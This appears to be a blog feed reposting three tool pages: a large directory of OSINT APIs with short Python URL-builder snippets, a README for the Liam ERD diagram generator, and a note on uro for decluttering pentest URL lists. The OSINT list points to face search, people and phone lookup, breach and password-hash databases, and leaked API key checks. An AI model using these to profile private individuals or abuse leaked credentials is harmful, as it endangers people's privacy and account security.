
API-s-for-OSINT - List Of API's For Gathering Information About Phone Numbers, Addresses, Domains Etc

By: Unknown

APIs For OSINT

This is a collection of APIs useful for automating various OSINT tasks.

Thank you for following me! https://cybdetective.com


    IOT/IP Search engines

    Name Link Description Price
    Shodan https://developer.shodan.io Search engine for Internet-connected hosts and devices from $59/month
    Netlas.io https://netlas-api.readthedocs.io/en/latest/ Search engine for Internet-connected hosts and devices. Read more at Netlas CookBook Partly FREE
    Fofa.so https://fofa.so/static_pages/api_help Search engine for Internet-connected hosts and devices ???
    Censys.io https://censys.io/api Search engine for Internet-connected hosts and devices Partly FREE
    Hunter.how https://hunter.how/search-api Search engine for Internet-connected hosts and devices Partly FREE
    Fullhunt.io https://api-docs.fullhunt.io/#introduction Search engine for Internet-connected hosts and devices Partly FREE
    IPQuery.io https://ipquery.io API for IP information such as IP risk, geolocation data, and ASN details FREE
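
Most of these services follow the same pattern: a REST endpoint plus an API key passed as a query parameter. As a minimal sketch (standard library only; the key value is a placeholder), Shodan's documented host-information endpoint can be called like this:

```python
import json
import urllib.parse
import urllib.request

SHODAN_API = "https://api.shodan.io"

def host_lookup_url(ip: str, api_key: str) -> str:
    """Build the URL for Shodan's host-information endpoint."""
    return f"{SHODAN_API}/shodan/host/{urllib.parse.quote(ip)}?" + \
        urllib.parse.urlencode({"key": api_key})

def host_lookup(ip: str, api_key: str) -> dict:
    """Fetch open ports and metadata for an IP (requires a valid key)."""
    with urllib.request.urlopen(host_lookup_url(ip, api_key)) as resp:
        return json.load(resp)

if __name__ == "__main__":
    # "YOUR_API_KEY" is a placeholder, not a working credential
    info = host_lookup("8.8.8.8", "YOUR_API_KEY")
    print(info.get("org"), info.get("ports"))
```

The same builder-function shape works for most of the other engines in this table; only the base URL and parameter names change.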

    Universal OSINT APIs

    Name Link Description Price
    Social Links https://sociallinks.io/products/sl-api Email info lookup, phone info lookup, individual and company profiling, social media tracking, dark web monitoring and more. Code example of using this API for face search in this repo PAID. Price per request

    Phone Number Lookup and Verification

    Name Link Description Price
    Numverify https://numverify.com Global Phone Number Validation & Lookup JSON API. Supports 232 countries. 250 requests FREE
    Twilio https://www.twilio.com/docs/lookup/api Provides a way to retrieve additional information about a phone number Free or $0.01 per request (for caller lookup)
    Plivo https://www.plivo.com/lookup/ Determine carrier, number type, format, and country for any phone number worldwide from $0.04 per request
    GetContact https://github.com/kovinevmv/getcontact Find info about a user by phone number from $6.89/month for 100 requests
    Veriphone https://veriphone.io/ Phone number validation & carrier lookup 1000 requests/month FREE
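
As a hedged sketch of calling one of these validation APIs: Veriphone documents a `GET /v2/verify` endpoint taking `phone` and `key` parameters (treat the exact shape as an assumption; the key is a placeholder). Note that E.164 numbers contain `+`, which must be percent-encoded:

```python
import urllib.parse

def veriphone_verify_url(phone: str, api_key: str) -> str:
    """Build a Veriphone verification URL; '+' in E.164 numbers becomes %2B."""
    query = urllib.parse.urlencode({"phone": phone, "key": api_key})
    return "https://api.veriphone.io/v2/verify?" + query
```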

    Address/ZIP codes lookup

    Name Link Description Price
    Global Address https://rapidapi.com/adminMelissa/api/global-address/ Easily verify, check or lookup address FREE
    US Street Address https://smartystreets.com/docs/cloud/us-street-api Validate and append data for any US postal address FREE
    Google Maps Geocoding API https://developers.google.com/maps/documentation/geocoding/overview convert addresses (like "1600 Amphitheatre Parkway, Mountain View, CA") into geographic coordinates 0.005 USD per request
    Postcoder https://postcoder.com/address-lookup Find address by postcode £130/5000 requests
    Zipcodebase https://zipcodebase.com Lookup postal codes, calculate distances and much more 5000 requests FREE
    Openweathermap geocoding API https://openweathermap.org/api/geocoding-api Get geographical coordinates (lat, lon) from a location name (city or area) 60 calls/minute, 1,000,000 calls/month FREE
    DistanceMatrix https://distancematrix.ai/product Calculate, evaluate and plan your routes $1.25-$2 per 1000 elements
    Geotagging API https://geotagging.ai/ Predict geolocations by texts Freemium
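
Geocoding calls are usually a single GET with the place name and a key. A sketch against OpenWeatherMap's direct geocoding endpoint from the table above (`/geo/1.0/direct`, per its public docs; the key is a placeholder):

```python
import urllib.parse

def owm_geocode_url(place: str, api_key: str, limit: int = 1) -> str:
    """URL for OpenWeatherMap's direct geocoding endpoint (name -> lat/lon)."""
    query = urllib.parse.urlencode({"q": place, "limit": limit, "appid": api_key})
    return "https://api.openweathermap.org/geo/1.0/direct?" + query
```

The response is a JSON array whose items carry `lat` and `lon` fields.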

    People and documents verification

    Name Link Description Price
    Appruve https://appruve.co Allows you to verify the identities of individuals, businesses, and connect to financial account data across Africa Paid
    Onfido https://onfido.com Onfido Document Verification lets your users scan a photo ID from any device, before checking it's genuine. Combined with Biometric Verification, it's a seamless way to anchor an account to the real identity of a customer. Paid
    Surepass https://surepass.io/passport-id-verification-api/ Passport, Photo ID and Driver License Verification in India Paid

    Business/Entity search

    Name Link Description Price
    OpenCorporates https://api.opencorporates.com Companies information Paid, price upon request
    Linkedin company search API https://docs.microsoft.com/en-us/linkedin/marketing/integrations/community-management/organizations/company-search?context=linkedin%2Fcompliance%2Fcontext&tabs=http Find companies using keywords, industry, location, and other criteria FREE
    Mattermark https://rapidapi.com/raygorodskij/api/Mattermark/ Get companies and investor information free 14-day trial, from $49 per month

    Domain/DNS/IP lookup

    Name Link Description Price
    API OSINT DS https://github.com/davidonzo/apiosintDS Collect info about IPv4/FQDN/URLs and file hashes in md5, sha1 or sha256 FREE
    InfoDB API https://www.ipinfodb.com/api The API returns the location of an IP address (country, region, city, zipcode, latitude, longitude) and the associated timezone in XML, JSON or plain text format FREE
    Domainsdb.info https://domainsdb.info Registered Domain Names Search FREE
    BGPView https://bgpview.docs.apiary.io/# Allows consumers to view all sorts of analytics data about the current state and structure of the internet FREE
    DNSCheck https://www.dnscheck.co/api Monitor the status of both individual DNS records and groups of related DNS records up to 10 DNS records/FREE
    Cloudflare Trace https://github.com/fawazahmed0/cloudflare-trace-api Get IP Address, Timestamp, User Agent, Country Code, IATA, HTTP Version, TLS/SSL Version & More FREE
    Host.io https://host.io/ Get info about domain FREE

    Mobile Apps Endpoints

    Name Link Description Price
    BeVigil OSINT API https://bevigil.com/osint-api provides access to millions of asset footprint data points including domain intel, cloud services, API information, and third party assets extracted from millions of mobile apps being continuously uploaded and scanned by users on bevigil.com 50 credits free/1000 credits/$50

    Scraping

    Name Link Description Price
    WebScraping.AI https://webscraping.ai/ Web Scraping API with built-in proxies and JS rendering FREE
    ZenRows https://www.zenrows.com/ Web Scraping API that bypasses anti-bot solutions while offering JS rendering and rotating proxies FREE

    Whois

    Name Link Description Price
    Whois freaks https://whoisfreaks.com/ Well-parsed and structured domain WHOIS data for all domain names, registrars, countries and TLDs since the birth of the internet $19/5000 requests
    WhoisXMLApi https://whois.whoisxmlapi.com Gathers a variety of domain ownership and registration data points from a comprehensive WHOIS database 500 requests/month FREE
    IP2Whois https://www.ip2whois.com/developers-api Get detailed info about a domain 500 requests/month FREE

    GEO IP

    Name Link Description Price
    Ipstack https://ipstack.com Detect country, region, city and zip code FREE
    Ipgeolocation.io https://ipgeolocation.io Provides country, city, state, province, local currency, latitude and longitude, company detail, ISP lookup, language, zip code, country calling code, time zone, current time, sunset and sunrise time, moonset and moonrise 30,000 requests per month/FREE
    IPInfoDB https://ipinfodb.com/api Free Geolocation tools and APIs for country, region, city and time zone lookup by IP address FREE
    IP API https://ip-api.com/ Free domain/IP geolocation info FREE
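
ip-api.com is the simplest of these to try because its free JSON endpoint needs no key (it is rate-limited, and the free tier is HTTP-only). A minimal sketch:

```python
import json
import urllib.request

def ip_api_url(ip: str) -> str:
    """ip-api.com free JSON endpoint (no key required; rate-limited)."""
    return f"http://ip-api.com/json/{ip}"

def geolocate(ip: str) -> dict:
    """Fetch country/city/ISP details for an IP address."""
    with urllib.request.urlopen(ip_api_url(ip)) as resp:
        return json.load(resp)

if __name__ == "__main__":
    print(geolocate("8.8.8.8"))
```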

    Wi-fi lookup

    Name Link Description Price
    Mylnikov API https://www.mylnikov.org public API implementation of Wi-Fi Geo-Location database FREE
    Wigle https://api.wigle.net/ get location and other information by SSID FREE

    Network

    Name Link Description Price
    PeeringDB https://www.peeringdb.com/apidocs/ Database of networks and the go-to location for interconnection data FREE
    PacketTotal https://packettotal.com/api.html Analyze .pcap files FREE

    Finance

    Name Link Description Price
    Binlist.net https://binlist.net/ Get bank information by BIN FREE
    FDIC Bank Data API https://banks.data.fdic.gov/docs/ institutions, locations and history events FREE
    Amdoren https://www.amdoren.com/currency-api/ Free currency API with over 150 currencies FREE
    VATComply.com https://www.vatcomply.com/documentation Exchange rates, geolocation and VAT number validation FREE
    Alpaca https://alpaca.markets/docs/api-documentation/api-v2/market-data/alpaca-data-api-v2/ Realtime and historical market data on all US equities and ETFs FREE
    Swiftcodesapi https://swiftcodesapi.com Verifying the validity of a bank SWIFT code or IBAN account number $39 per month/4000 swift lookups
    IBANAPI https://ibanapi.com Validate IBAN numbers and get bank account information Freemium/$10 starter plan

    Email

    Name Link Description Price
    EVA https://eva.pingutil.com/ Measuring email deliverability & quality FREE
    Mailboxlayer https://mailboxlayer.com/ Simple REST API measuring email deliverability & quality 100 requests FREE, 5000 requests/month for $14.49
    EmailCrawlr https://emailcrawlr.com/ Get key information about company websites. Find all email addresses associated with a domain. Get social accounts associated with an email. Verify email address deliverability. 200 requests FREE, 5000 requests for $40
    Voila Norbert https://www.voilanorbert.com/api/ Find anyone's email address and ensure your emails reach real people from $49/month
    Kickbox https://open.kickbox.com/ Email verification API FREE
    FachaAPI https://api.facha.dev/ Allows checking if an email domain is a temporary email domain FREE

    Names/Surnames

    Name Link Description Price
    Genderize.io https://genderize.io Instantly answers the question of how likely a certain name is to be male or female and shows the popularity of the name. 1000 names/day free
    Agify.io https://agify.io Predicts the age of a person given their name 1000 names/day free
    Nationalize.io https://nationalize.io Predicts the nationality of a person given their name 1000 names/day free
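
These three services share the same query pattern (`?name=...` against `api.<service>.io`), so one helper covers them all. A small sketch:

```python
import urllib.parse

# The three sibling services from the table above share one URL shape
SERVICES = {"genderize", "agify", "nationalize"}

def name_predict_url(service: str, name: str) -> str:
    """Build a prediction URL for genderize/agify/nationalize."""
    if service not in SERVICES:
        raise ValueError(f"unknown service: {service}")
    return f"https://api.{service}.io/?" + urllib.parse.urlencode({"name": name})
```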

    Pastebin/Leaks

    Name Link Description Price
    HaveIBeenPwned https://haveibeenpwned.com/API/v3 Retrieve the list of pwned accounts (email addresses and usernames) $3.50 per month
    Psbdmp.ws https://psbdmp.ws/api Search in Pastebin dumps $9.95 per 10000 requests
    LeakPeek https://psbdmp.ws/api Search in leaks databases $9.99 per 4 weeks unlimited access
    BreachDirectory.com https://breachdirectory.com/api_documentation Search domains in data breach databases FREE
    LeakLookup https://leak-lookup.com/api Search domain, email_address, fullname, ip address, phone, password, username in leaks databases 10 requests FREE
    BreachDirectory.org https://rapidapi.com/rohan-patra/api/breachdirectory/pricing Search domain, email_address, fullname, ip address, phone, password, username in leaks databases (possible to view password hashes) 50 requests/month FREE
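
Unlike the key-in-URL services above, HIBP v3 puts the key in a `hibp-api-key` header and requires a User-Agent. A sketch of building the authenticated request (key and UA string are placeholders):

```python
import urllib.parse
import urllib.request

def hibp_request(account: str, api_key: str) -> urllib.request.Request:
    """Authenticated HIBP v3 breachedaccount request (key goes in a header)."""
    url = "https://haveibeenpwned.com/api/v3/breachedaccount/" + \
        urllib.parse.quote(account)  # '@' in emails must be percent-encoded
    return urllib.request.Request(
        url,
        headers={"hibp-api-key": api_key, "User-Agent": "osint-demo"},
    )
```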

    Archives

    Name Link Description Price
    Wayback Machine API (Memento API, CDX Server API, Wayback Availability JSON API) https://archive.org/help/wayback_api.php Retrieve information about Wayback capture data FREE
    TROVE (Australian Web Archive) API https://trove.nla.gov.au/about/create-something/using-api Retrieve information about TROVE capture data FREE
    Archive-it API https://support.archive-it.org/hc/en-us/articles/115001790023-Access-Archive-It-s-Wayback-index-with-the-CDX-C-API Retrieve information about archive-it capture data FREE
    UK Web Archive API https://ukwa-manage.readthedocs.io/en/latest/#api-reference Retrieve information about UK Web Archive capture data FREE
    Arquivo.pt API https://github.com/arquivo/pwa-technologies/wiki/Arquivo.pt-API Allows full-text search and access to preserved web content and related metadata. It is also possible to search by URL, accessing all versions of preserved web content. The API returns a JSON object. FREE
    Library Of Congress archive API https://www.loc.gov/apis/ Provides structured data about Library of Congress collections FREE
    BotsArchive https://botsarchive.com/docs.html JSON formatted details about Telegram Bots available in database FREE
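
The Wayback Availability JSON API from the table above is the quickest of these to script: it returns the closest archived snapshot for a URL, optionally near a timestamp. A sketch:

```python
import urllib.parse

def wayback_available_url(url: str, timestamp: str = "") -> str:
    """Wayback Availability JSON API: closest archived snapshot for a URL."""
    params = {"url": url}
    if timestamp:
        # YYYYMMDDhhmmss; any prefix (e.g. just a year) is accepted
        params["timestamp"] = timestamp
    return "https://archive.org/wayback/available?" + urllib.parse.urlencode(params)
```

The response's `archived_snapshots.closest.url` field (when present) points at the capture.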

    Hashes decrypt/encrypt

    Name Link Description Price
    MD5 Decrypt https://md5decrypt.net/en/Api/ Search for decrypted hashes in the database 1.99 EURO/day

    Crypto

    Name Link Description Price
    BTC.com https://btc.com/btc/adapter?type=api-doc Get information about addresses and transactions FREE
    Blockchair https://blockchair.com Explore data stored on 17 blockchains (BTC, ETH, Cardano, Ripple etc) $0.33 - $1 per 1000 calls
    BitcoinAbuse https://www.bitcoinabuse.com/api-docs Lookup bitcoin addresses that have been linked to criminal activity FREE
    Bitcoinwhoswho https://www.bitcoinwhoswho.com/api Scam reports on the Bitcoin Address FREE
    Etherscan https://etherscan.io/apis Ethereum explorer API FREE
    apilayer coinlayer https://coinlayer.com Real-time Crypto Currency Exchange Rates FREE
    BlockFacts https://blockfacts.io/ Real-time crypto data from multiple exchanges via a single unified API, and much more FREE
    Brave NewCoin https://bravenewcoin.com/developers Real-time and historic crypto data from more than 200+ exchanges FREE
    WorldCoinIndex https://www.worldcoinindex.com/apiservice Cryptocurrencies Prices FREE
    WalletLabels https://www.walletlabels.xyz/docs Labels for 7.5 million Ethereum wallets FREE
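
Etherscan's API multiplexes everything through one endpoint with `module`/`action` parameters. A sketch of its account-balance lookup (key is a placeholder; the address below is illustrative only):

```python
import urllib.parse

def etherscan_balance_url(address: str, api_key: str) -> str:
    """Etherscan account-balance endpoint (module=account, action=balance)."""
    query = urllib.parse.urlencode({
        "module": "account",
        "action": "balance",
        "address": address,
        "tag": "latest",
        "apikey": api_key,
    })
    return "https://api.etherscan.io/api?" + query
```

The balance comes back in wei (divide by 10**18 for ETH).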

    Malware

    Name Link Description Price
    VirusTotal https://developers.virustotal.com/reference Analyze files and URLs Public API is FREE
    AbuseIPDB https://docs.abuseipdb.com/#introduction IP/domain/URL reputation FREE
    AlienVault Open Threat Exchange (OTX) https://otx.alienvault.com/api IP/domain/URL reputation FREE
    Phisherman https://phisherman.gg IP/domain/URL reputation FREE
    URLScan.io https://urlscan.io/about-api/ Scan and analyse URLs FREE
    Web of Trust https://support.mywot.com/hc/en-us/sections/360004477734-API- IP/domain/URL reputation FREE
    Threat Jammer https://threatjammer.com/docs/introduction-threat-jammer-user-api IP/domain/URL reputation ???
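
VirusTotal's v3 API authenticates with an `x-apikey` header rather than a query parameter. A sketch of requesting a file report by SHA-256 (key is a placeholder):

```python
import urllib.request

def vt_file_report(sha256: str, api_key: str) -> urllib.request.Request:
    """VirusTotal v3 file-report request; the key goes in the x-apikey header."""
    url = "https://www.virustotal.com/api/v3/files/" + sha256
    return urllib.request.Request(url, headers={"x-apikey": api_key})
```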

    Face Search

    Name Link Description Price
    Search4faces https://search4faces.com/api.html Search for people in social networks by facial image $21 per 1000 requests

    Face Detection

    Name Link Description Price
    Face++ https://www.faceplusplus.com/face-detection/ Detect and locate human faces within an image, returning high-precision face bounding boxes; metadata of each detected face can be stored for future use from $0.03 per call
    BetaFace https://www.betafaceapi.com/wpa/ Can scan uploaded image files or image URLs, find faces and analyze them. The API also provides verification (face comparison) and identification (face search) services, and can maintain multiple user-defined recognition databases (namespaces) 50 images per day FREE/from 0.15 EUR per request

    Reverse Image Search

    Name Link Description Price
    Google Reverse images search API https://github.com/SOME-1HING/google-reverse-image-api/ This is a simple API built using Node.js and Express.js that allows you to perform Google Reverse Image Search by providing an image URL. FREE (UNOFFICIAL)
    TinEyeAPI https://services.tineye.com/TinEyeAPI Verify images, Moderate user-generated content, Track images and brands, Check copyright compliance, Deploy fraud detection solutions, Identify stock photos, Confirm the uniqueness of an image Start from $200/5000 searches
    Bing Images Search API https://www.microsoft.com/en-us/bing/apis/bing-image-search-api With Bing Image Search API v7, help users scour the web for images. Results include thumbnails, full image URLs, publishing website info, image metadata, and more. 1,000 requests free per month FREE
    MRISA https://github.com/vivithemage/mrisa MRISA (Meta Reverse Image Search API) is a RESTful API which takes an image URL, does a reverse Google image search, and returns a JSON array with the search results FREE (unofficial)
    PicImageSearch https://github.com/kitUIN/PicImageSearch Aggregator for different reverse image search APIs FREE (unofficial)

    AI Geolocation

    Name Link Description Price
    Geospy https://api.geospy.ai/ Estimates the location of an uploaded photo Access by request
    Picarta https://picarta.ai/api Estimates the location of an uploaded photo 100 requests/day FREE

    Social Media and Messengers

    Name Link Description Price
    Twitch https://dev.twitch.tv/docs/v5/reference
    YouTube Data API https://developers.google.com/youtube/v3
    Reddit https://www.reddit.com/dev/api/
    Vkontakte https://vk.com/dev/methods
    Twitter API https://developer.twitter.com/en
    Linkedin API https://docs.microsoft.com/en-us/linkedin/
    All Facebook and Instagram API https://developers.facebook.com/docs/
    Whatsapp Business API https://www.whatsapp.com/business/api
    Telegram and Telegram Bot API https://core.telegram.org
    Weibo API https://open.weibo.com/wiki/API文档/en
    XING https://dev.xing.com/partners/job_integration/api_docs
    Viber https://developers.viber.com/docs/api/rest-bot-api/
    Discord https://discord.com/developers/docs
    Odnoklassniki https://ok.ru/apiok
    Blogger https://developers.google.com/blogger/ The Blogger APIs allows client applications to view and update Blogger content FREE
    Disqus https://disqus.com/api/docs/auth/ Communicate with Disqus data FREE
    Foursquare https://developer.foursquare.com/ Interact with Foursquare users and places (geolocation-based checkins, photos, tips, events, etc) FREE
    HackerNews https://github.com/HackerNews/API Social news for CS and entrepreneurship FREE
    Kakao https://developers.kakao.com/ Kakao Login, Share on KakaoTalk, Social Plugins and more FREE
    Line https://developers.line.biz/ Line Login, Share on Line, Social Plugins and more FREE
    TikTok https://developers.tiktok.com/doc/login-kit-web Fetches user info and user's video posts on TikTok platform FREE
    Tumblr https://www.tumblr.com/docs/en/api/v2 Read and write Tumblr Data FREE

    UNOFFICIAL APIs

    WARNING: Use with caution! Accounts may be blocked permanently for using unofficial APIs.

    Name Link Description Price
    TikTok https://github.com/davidteather/TikTok-Api The Unofficial TikTok API Wrapper In Python FREE
    Google Trends https://github.com/suryasev/unofficial-google-trends-api Unofficial Google Trends API FREE
    YouTube Music https://github.com/sigma67/ytmusicapi Unofficial API for YouTube Music FREE
    Duolingo https://github.com/KartikTalwar/Duolingo Duolingo unofficial API (can gather info about users) FREE
    Steam https://github.com/smiley/steamapi An unofficial object-oriented Python library for accessing the Steam Web API FREE
    Instagram https://github.com/ping/instagram_private_api Instagram Private API FREE
    Discord https://github.com/discordjs/discord.js JavaScript library for interacting with the Discord API FREE
    Zhihu https://github.com/syaning/zhihu-api Unofficial API for Zhihu FREE
    Quora https://github.com/csu/quora-api Unofficial API for Quora FREE
    DnsDumpster https://github.com/PaulSec/API-dnsdumpster.com (Unofficial) Python API for DnsDumpster FREE
    PornHub https://github.com/sskender/pornhub-api Unofficial API for PornHub in Python FREE
    Skype https://github.com/ShyykoSerhiy/skyweb Unofficial Skype API for nodejs via 'Skype (HTTP)' protocol. FREE
    Google Search https://github.com/aviaryan/python-gsearch Google Search unofficial API for Python with no external dependencies FREE
    Airbnb https://github.com/nderkach/airbnb-python Python wrapper around the Airbnb API (unofficial) FREE
    Medium https://github.com/enginebai/PyMedium Unofficial Medium Python Flask API and SDK FREE
    Facebook https://github.com/davidyen1124/Facebot Powerful unofficial Facebook API FREE
    Linkedin https://github.com/tomquirk/linkedin-api Unofficial Linkedin API for Python FREE
    Y2mate https://github.com/Simatwa/y2mate-api Unofficial Y2mate API for Python FREE
    Livescore https://github.com/Simatwa/livescore-api Unofficial Livescore API for Python FREE

    Search Engines

    Name Link Description Price
    Google Custom Search JSON API https://developers.google.com/custom-search/v1/overview Search in Google 100 requests FREE
    Serpstack https://serpstack.com/ Google search results to JSON FREE
    Serpapi https://serpapi.com Google, Baidu, Yandex, Yahoo, DuckDuckGo, Bing and many other search results $50/5000 searches/month
    Bing Web Search API https://www.microsoft.com/en-us/bing/apis/bing-web-search-api Search in Bing (+instant answers and location) 1000 transactions per month FREE
    WolframAlpha API https://products.wolframalpha.com/api/pricing/ Short answers, conversations, calculators and many more from $25 per 1000 queries
    DuckDuckGo Instant Answers API https://duckduckgo.com/api An API for some Instant Answers, not for full search results. FREE

    Memex Marginalia https://memex.marginalia.nu/projects/edge/api.gmi An API for the new privacy-focused search engine FREE
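
The DuckDuckGo Instant Answers API is the only keyless entry in this table, which makes it handy for quick experiments. A sketch of building its query URL:

```python
import urllib.parse

def ddg_instant_answer_url(query: str) -> str:
    """DuckDuckGo Instant Answer API (abstracts/definitions, not full SERPs)."""
    params = {"q": query, "format": "json", "no_html": 1}
    return "https://api.duckduckgo.com/?" + urllib.parse.urlencode(params)
```

The JSON response's `AbstractText` and `RelatedTopics` fields hold the instant-answer content.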

    News analyze

    Name Link Description Price
    MediaStack https://mediastack.com/ News articles search results in JSON 500 requests/month FREE

    Darknet

    Name Link Description Price
    Darksearch.io https://darksearch.io/apidoc Search websites in the .onion zone FREE
    Onion Lookup https://onion.ail-project.org/ onion-lookup is a service for checking the existence of Tor hidden services and retrieving their associated metadata. onion-lookup relies on a private AIL instance to obtain the metadata FREE

    Torrents/file sharing

    Name Link Description Price
    Jackett https://github.com/Jackett/Jackett API to automate searching across different torrent trackers FREE
    Torrents API PY https://github.com/Jackett/Jackett Unofficial API for 1337x, Piratebay, Nyaasi, Torlock, Torrent Galaxy, Zooqle, Kickass, Bitsearch, MagnetDL,Libgen, YTS, Limetorrent, TorrentFunk, Glodls, Torre FREE
    Torrent Search API https://github.com/Jackett/Jackett API for Torrent Search Engine with Extratorrents, Piratebay, and ISOhunt 500 queries/day FREE
    Torrent search api https://github.com/JimmyLaurent/torrent-search-api Yet another node torrent scraper (supports iptorrents, torrentleech, torrent9, torrentz2, 1337x, thepiratebay, Yggtorrent, TorrentProject, Eztv, Yts, LimeTorrents) FREE
    Torrentinim https://github.com/sergiotapia/torrentinim Very low memory-footprint, self hosted API-only torrent search engine. Sonarr + Radarr Compatible, native support for Linux, Mac and Windows. FREE

    Vulnerabilities

    Name Link Description Price
    National Vulnerability Database CVE Search API https://nvd.nist.gov/developers/vulnerabilities Get basic information about CVE and CVE history FREE
    OpenCVE API https://docs.opencve.io/api/cve/ Get basic information about CVE FREE
    CVEDetails API https://www.cvedetails.com/documentation/apis Get basic information about CVE partly FREE (?)
    CVESearch API https://docs.cvesearch.com/ Get basic information about CVE by request
    KEVin API https://kevin.gtfkd.com/ API for accessing CISA's Known Exploited Vulnerabilities Catalog (KEV) and CVE Data FREE
    Vulners.com API https://vulners.com Get basic information about CVE FREE for personal use
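
The NVD CVE API 2.0 accepts a `cveId` query parameter for single-CVE lookups and needs no key for light use. A sketch:

```python
import urllib.parse

def nvd_cve_url(cve_id: str) -> str:
    """NVD CVE API 2.0: look up a single CVE by its identifier."""
    return "https://services.nvd.nist.gov/rest/json/cves/2.0?" + \
        urllib.parse.urlencode({"cveId": cve_id})
```

The response's `vulnerabilities[0].cve` object carries descriptions, CVSS metrics and references.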

    Flights

    Name Link Description Price
    Aviation Stack https://aviationstack.com Get information about flights, aircraft and airlines FREE
    OpenSky Network https://opensky-network.org/apidoc/index.html Free real-time ADS-B aviation data FREE
    AviationAPI https://docs.aviationapi.com/ FAA Aeronautical Charts and Publications, Airport Information, and Airport Weather FREE
    FachaAPI https://api.facha.dev Aircraft details and live positioning API FREE
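
OpenSky's documented `/states/all` endpoint can be restricted to a latitude/longitude bounding box with `lamin`/`lomin`/`lamax`/`lomax` parameters (anonymous access is rate-limited). A sketch for the area around Switzerland, used here purely as an illustrative box:

```python
import urllib.parse

def opensky_states_url(lamin: float, lomin: float,
                       lamax: float, lomax: float) -> str:
    """OpenSky /states/all limited to a lat/lon bounding box."""
    params = {"lamin": lamin, "lomin": lomin, "lamax": lamax, "lomax": lomax}
    return "https://opensky-network.org/api/states/all?" + \
        urllib.parse.urlencode(params)
```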

    Webcams

    Name Link Description Price
    Windy Webcams API https://api.windy.com/webcams/docs Get a list of available webcams for a country, city or geographical coordinates FREE with limits or 9990 euro without limits

    ## Regex

    Name Link Description Price
    Autoregex https://autoregex.notion.site/AutoRegex-API-Documentation-97256bad2c114a6db0c5822860214d3a Convert English phrase to regular expression from $3.49/month

    API testing tools

    Name Link
    API Guessr (detect API by auth key or by token) https://api-guesser.netlify.app/
    REQBIN Online REST & SOAP API Testing Tool https://reqbin.com
    ExtendClass Online REST Client https://extendsclass.com/rest-client-online.html
    Codebeautify.org Online API Test https://codebeautify.org/api-test
    SyncWith Google Sheet add-on. Link more than 1000 APIs with Spreadsheet https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget
    Talend API Tester Google Chrome Extension https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget
    Michael Bazzell's API search tools https://inteltechniques.com/tools/API.html

    Curl converters (tools that help to write code using API queries)

    Name Link
    Convert curl commands to Python, JavaScript, PHP, R, Go, C#, Ruby, Rust, Elixir, Java, MATLAB, Dart, CFML, Ansible URI or JSON https://curlconverter.com
    Curl-to-PHP. Instantly convert curl commands to PHP code https://incarnate.github.io/curl-to-php/
    Curl to PHP online (Codebeatify) https://codebeautify.org/curl-to-php-online
    Curl to JavaScript fetch https://kigiri.github.io/fetch/
    Curl to JavaScript fetch (Scrapingbee) https://www.scrapingbee.com/curl-converter/javascript-fetch/
    Curl to C# converter https://curl.olsh.me
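
To make the conversion idea concrete, here is roughly what such converters produce for a simple authenticated GET. The endpoint and header below are hypothetical, invented for illustration only:

```python
# Hypothetical source command:
#   curl -H "X-Api-Key: SECRET" "https://api.example.com/v1/lookup?q=test"
import json
import urllib.request

# The -H header from the curl command is carried over into the Request
req = urllib.request.Request(
    "https://api.example.com/v1/lookup?q=test",
    headers={"X-Api-Key": "SECRET"},
)

def run() -> dict:
    """Execute the converted request (would need a real endpoint)."""
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)
```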

    Create your own API

    Name Link
    Sheety. Create an API from a Google Sheet https://sheety.co/
    Postman. Platform for creating your own API https://www.postman.com
    Retool. REST API Generator https://retool.com/api-generator/
    Beeceptor. REST API mocking and intercepting in seconds (no coding) https://beeceptor.com

    Distribute your own API

    Name Link
    RapidAPI. Market your API for millions of developers https://rapidapi.com/solution/api-provider/
    Apilayer. API Marketplace https://apilayer.com

    API Keys Info

    Name Link Description
    Keyhacks https://github.com/streaak/keyhacks Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
    All about APIKey https://github.com/daffainfo/all-about-apikey Detailed information about API key / OAuth token for different services (Description, Request, Response, Regex, Example)
    API Guessr https://api-guesser.netlify.app/ Enter an API key and find out which service it belongs to

    API directories

    If you don't find what you need, try searching these directories.

    Name Link Description
    APIDOG ApiHub https://apidog.com/apihub/
    Rapid APIs collection https://rapidapi.com/collections
    API Ninjas https://api-ninjas.com/api
    APIs Guru https://apis.guru/
    APIs List https://apislist.com/
    API Context Directory https://apicontext.com/api-directory/
    Any API https://any-api.com/
    Public APIs Github repo https://github.com/public-apis/public-apis

    How to learn to work with REST APIs?

    If you don't know how to work with the REST API, I recommend you check out the Netlas API guide I wrote for Netlas.io.

    Netlas Cookbook

    It explains briefly and accessibly how to automate requests in different programming languages (with a focus on Python and Bash) and how to process the resulting JSON data.




    Liam - Automatically Generates Beautiful And Easy-To-Read ER Diagrams From Your Database

    By: Unknown

    Automatically generates beautiful and easy-to-read ER diagrams from your database.

    Website • Documentation • Roadmap

    What's Liam ERD?

    Liam ERD generates beautiful, interactive ER diagrams from your database. Whether you're working on public or private repositories, Liam ERD helps you visualize complex schemas with ease.

    • Beautiful UI & Interactive: A clean design and intuitive features (like panning, zooming, and filtering) make it easy to understand even the most complex databases.
    • Simple Reverse Engineering: Seamlessly turn your existing database schemas into clear, readable diagrams.
    • Effortless Setup: Get started with zero configuration; just provide your schema, and you're good to go.
    • High Performance: Optimized for both small and large projects, easily handling 100+ tables.
    • Fully Open-Source: Contribute to the project and shape Liam ERD to fit your needs.

    Quick Start

    For Public Repositories

    Insert liambx.com/erd/p/ into your schema file's URL:

    # Original: https://github.com/user/repo/blob/master/db/schema.rb
    # Modified: https://liambx.com/erd/p/github.com/user/repo/blob/master/db/schema.rb

    For Private Repositories

    Run the interactive setup:

    npx @liam-hq/cli init

    If you find this project helpful, please give it a star! ⭐
    Your support helps us reach a wider audience and continue development.

    Documentation

    Check out the full documentation on the website.

    Roadmap

    See what we're working on and what's coming next on our roadmap.



    Uro - Declutters Url Lists For Crawling/Pentesting

    By: Unknown


    Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.

    It doesn't make any HTTP requests to the URLs and removes:

    • incremental urls, e.g. /page/1/ and /page/2/
    • blog posts and similar human-written content, e.g. /posts/a-brief-history-of-time
    • urls with the same path but different parameter values, e.g. /page.php?id=1 and /page.php?id=2
    • images, js, css and other "useless" files


    Installation

    The recommended way to install uro is as follows:

    pipx install uro

    Note: If you are using an older version of python, use pip instead of pipx

